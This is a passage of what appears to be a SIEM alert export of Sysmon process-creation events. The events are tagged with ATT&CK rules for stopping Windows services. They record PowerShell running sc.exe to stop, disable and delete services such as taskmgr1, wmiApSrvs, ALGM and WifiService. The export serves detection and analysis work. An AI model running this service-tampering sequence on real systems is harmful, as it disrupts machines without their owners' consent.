taskmgr1",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:02.356285400Z"",""eventRecordID"":""2420"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:02.354\r\nProcessGuid: {df9fc3d3-b37a-5ecf-0000-0010bb2f1e00}\r\nProcessId: 6072\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop taskmgr1\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:02.354"",""processGuid"":""{df9fc3d3-b37a-5ecf-0000-0010bb2f1e00}"",""processId"":""6072"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop taskmgr1"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:30.577",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:02.334 +ProcessGuid: {df9fc3d3-b37a-5ecf-0000-0010d42e1e00} +ProcessId: 7796 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Config taskmgr1 Start= Disabled +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Config taskmgr1 Start= Disabled",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:02.336820300Z"",""eventRecordID"":""2419"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:02.334\r\nProcessGuid: {df9fc3d3-b37a-5ecf-0000-0010d42e1e00}\r\nProcessId: 7796\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Config taskmgr1 Start= Disabled\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:02.334"",""processGuid"":""{df9fc3d3-b37a-5ecf-0000-0010d42e1e00}"",""processId"":""7796"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Config taskmgr1 Start= Disabled"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:30.527",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:02.295 +ProcessGuid: {df9fc3d3-b37a-5ecf-0000-00100c2d1e00} +ProcessId: 6100 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop wmiApServs +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop wmiApServs",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:02.297203900Z"",""eventRecordID"":""2417"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:02.295\r\nProcessGuid: {df9fc3d3-b37a-5ecf-0000-00100c2d1e00}\r\nProcessId: 6100\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop wmiApServs\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:02.295"",""processGuid"":""{df9fc3d3-b37a-5ecf-0000-00100c2d1e00}"",""processId"":""6100"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop wmiApServs"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:30.480",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:02.232 +ProcessGuid: {df9fc3d3-b37a-5ecf-0000-0010512a1e00} +ProcessId: 6024 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop wmiApSrvs +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop wmiApSrvs",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:02.234225200Z"",""eventRecordID"":""2414"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:02.232\r\nProcessGuid: {df9fc3d3-b37a-5ecf-0000-0010512a1e00}\r\nProcessId: 6024\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop wmiApSrvs\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:02.232"",""processGuid"":""{df9fc3d3-b37a-5ecf-0000-0010512a1e00}"",""processId"":""6024"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop wmiApSrvs"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:30.431",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:02.190 +ProcessGuid: {df9fc3d3-b37a-5ecf-0000-001081281e00} +ProcessId: 4216 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Delete ALGM +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Delete ALGM",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:02.195546400Z"",""eventRecordID"":""2412"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:02.190\r\nProcessGuid: {df9fc3d3-b37a-5ecf-0000-001081281e00}\r\nProcessId: 4216\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Delete ALGM\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:02.190"",""processGuid"":""{df9fc3d3-b37a-5ecf-0000-001081281e00}"",""processId"":""4216"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Delete ALGM"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:30.399",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:02.169 +ProcessGuid: {df9fc3d3-b37a-5ecf-0000-00108e271e00} +ProcessId: 5612 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop ALGM +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop ALGM",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:02.177781100Z"",""eventRecordID"":""2411"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:02.169\r\nProcessGuid: {df9fc3d3-b37a-5ecf-0000-00108e271e00}\r\nProcessId: 5612\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop ALGM\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:02.169"",""processGuid"":""{df9fc3d3-b37a-5ecf-0000-00108e271e00}"",""processId"":""5612"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop ALGM"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:30.338",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:02.108 +ProcessGuid: {df9fc3d3-b37a-5ecf-0000-00109f241e00} +ProcessId: 2580 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop WifiService +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop WifiService",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:02.113548900Z"",""eventRecordID"":""2408"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:02.108\r\nProcessGuid: {df9fc3d3-b37a-5ecf-0000-00109f241e00}\r\nProcessId: 2580\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop WifiService\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John 